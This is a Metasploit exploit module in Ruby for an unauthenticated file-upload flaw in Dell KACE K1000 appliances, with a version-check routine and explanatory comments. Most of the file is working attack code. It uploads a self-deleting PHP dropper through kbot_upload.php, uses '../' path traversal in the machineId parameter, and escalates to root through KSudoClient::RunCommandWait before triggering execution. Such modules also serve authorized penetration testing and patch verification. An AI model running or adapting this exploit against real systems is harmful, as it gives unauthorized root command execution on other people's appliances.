##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
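class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # First fixed builds of the 5.4 and 5.5 branches, as stated in the
  # description ("prior to ..."). #check treats these builds themselves as
  # patched; the previous comparison used <= and flagged the fixed build too.
  FIXED_BUILD_5_4 = 76849
  FIXED_BUILD_5_5 = 90547

  # Module metadata. The payload is embedded in a single-quoted PHP string,
  # hence 0x27 in BadChars; 0x00 is excluded because the dropper is a PHP
  # source file. The perl cmd payload is required because that is what the
  # tested appliance (FreeBSD-based, 'unix' platform) had available.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Dell KACE K1000 File Upload',
      'Description' => %q{
        This module exploits a file upload vulnerability in Kace K1000
        versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547
        which allows unauthenticated users to execute arbitrary commands
        under the context of the 'www' user.

        This module also abuses the 'KSudoClient::RunCommandWait' function
        to gain root privileges.

        This module has been tested successfully with Dell KACE K1000
        version 5.3.
      },
      'License' => MSF_LICENSE,
      'Privileged' => true,
      'Platform' => 'unix', # FreeBSD
      'Arch' => ARCH_CMD,
      'Author' =>
        [
          'Bradley Austin (steponequit)', # Initial discovery and exploit
          'bcoles', # Metasploit
        ],
      'References' =>
        [
          ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']
        ],
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00\x27",
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl'
            }
        },
      'DefaultTarget' => 0,
      'Targets' =>
        [
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'DisclosureDate' => '2014-03-07'))
  end

  # Fingerprints the appliance from the X-DellKACE-* headers returned by a bare
  # GET to /service/kbot_upload.php (expected to answer 500) and compares the
  # advertised build against the affected ranges in the description.
  #
  # @return [Exploit::CheckCode] Unknown when no response arrives; Safe when the
  #   host is not a K1000 or its version is outside the affected ranges;
  #   Detected for a K1000 whose version header is missing or unparseable;
  #   Vulnerable otherwise.
  def check
    res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))
    unless res
      vprint_error('Connection failed')
      return Exploit::CheckCode::Unknown
    end

    # .to_s guards against a 500 from a non-KACE host that lacks the header;
    # calling #downcase on nil used to raise instead of returning Safe.
    appliance = res.headers['X-DellKACE-Appliance'].to_s.downcase
    return Exploit::CheckCode::Safe unless res.code == 500 && appliance == 'k1000'

    version = res.headers['X-DellKACE-Version'].to_s
    match = version.match(/\A([0-9])\.([0-9])\.([0-9]+)\z/)
    return Exploit::CheckCode::Detected unless match

    vprint_status("Found Dell KACE K1000 version #{version}")
    major, minor, build = match.captures.map(&:to_i)
    return Exploit::CheckCode::Safe unless major == 5

    vulnerable =
      case minor
      when 0..3 then true                         # 5.0 to 5.3: every build
      when 4 then build < FIXED_BUILD_5_4         # 5.4 prior to 5.4.76849
      when 5 then build < FIXED_BUILD_5_5         # 5.5 prior to 5.5.90547
      else false
      end
    vulnerable ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
  end

  # Uploads a PHP dropper through the unauthenticated kbot_upload.php endpoint,
  # steering it into the web-served tmp directory via '../' in machineId, then
  # requests it so the web server executes it. The dropper first removes its
  # own file and then hands the payload to KSudoClient::RunCommandWait, which
  # is what yields root rather than 'www'.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the target is unreachable,
  #   the upload is rejected, or the dropper cannot be found / executed.
  def exploit
    # Leading dot keeps the dropper out of a casual directory listing.
    fname = ".#{rand_text_alphanumeric(rand(5..12))}.php"
    payload_path = '/kbox/kboxwww/tmp/'
    # payload.encoded lives inside a single-quoted PHP string; BadChars excludes
    # 0x27 so the payload can never terminate that string early.
    post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"
    print_status("Uploading #{fname} (#{post_data.length} bytes)")

    # Only filename and machineId carry meaning; the remaining parameters are
    # filler the endpoint expects. 'patchsecheduleid' is spelled as in the
    # original exploit - do not "correct" it without checking the endpoint.
    # Parameter order is shuffled on every run.
    upload_params = {
      'filename' => fname,
      'machineId' => "#{'../' * rand(4..8)}#{payload_path}",
      'checksum' => 'SCRAMBLE',
      'mac' => rand_text_alphanumeric(rand(5..12)),
      'kbotId' => rand_text_alphanumeric(rand(5..12)),
      'version' => rand_text_alphanumeric(rand(5..12)),
      'patchsecheduleid' => rand_text_alphanumeric(rand(5..12))
    }
    res = send_request_cgi(
      'uri' => normalize_uri('service', 'kbot_upload.php'),
      'method' => 'POST',
      'vars_get' => upload_params.to_a.shuffle.to_h,
      'data' => post_data
    )
    fail_with(Failure::Unreachable, 'Connection failed') unless res
    fail_with(Failure::UnexpectedReply, 'Unable to upload payload') unless res.code == 200
    print_good('Payload uploaded successfully')

    # Trigger execution; a 404 here means the traversal did not land in tmp.
    res = send_request_cgi('uri' => normalize_uri('tmp', fname))
    fail_with(Failure::Unreachable, 'Connection failed') unless res

    case res.code
    when 200
      print_good('Payload executed successfully')
    when 404
      fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")
    else
      fail_with(Failure::UnexpectedReply, 'Unable to execute payload')
    end
  end
end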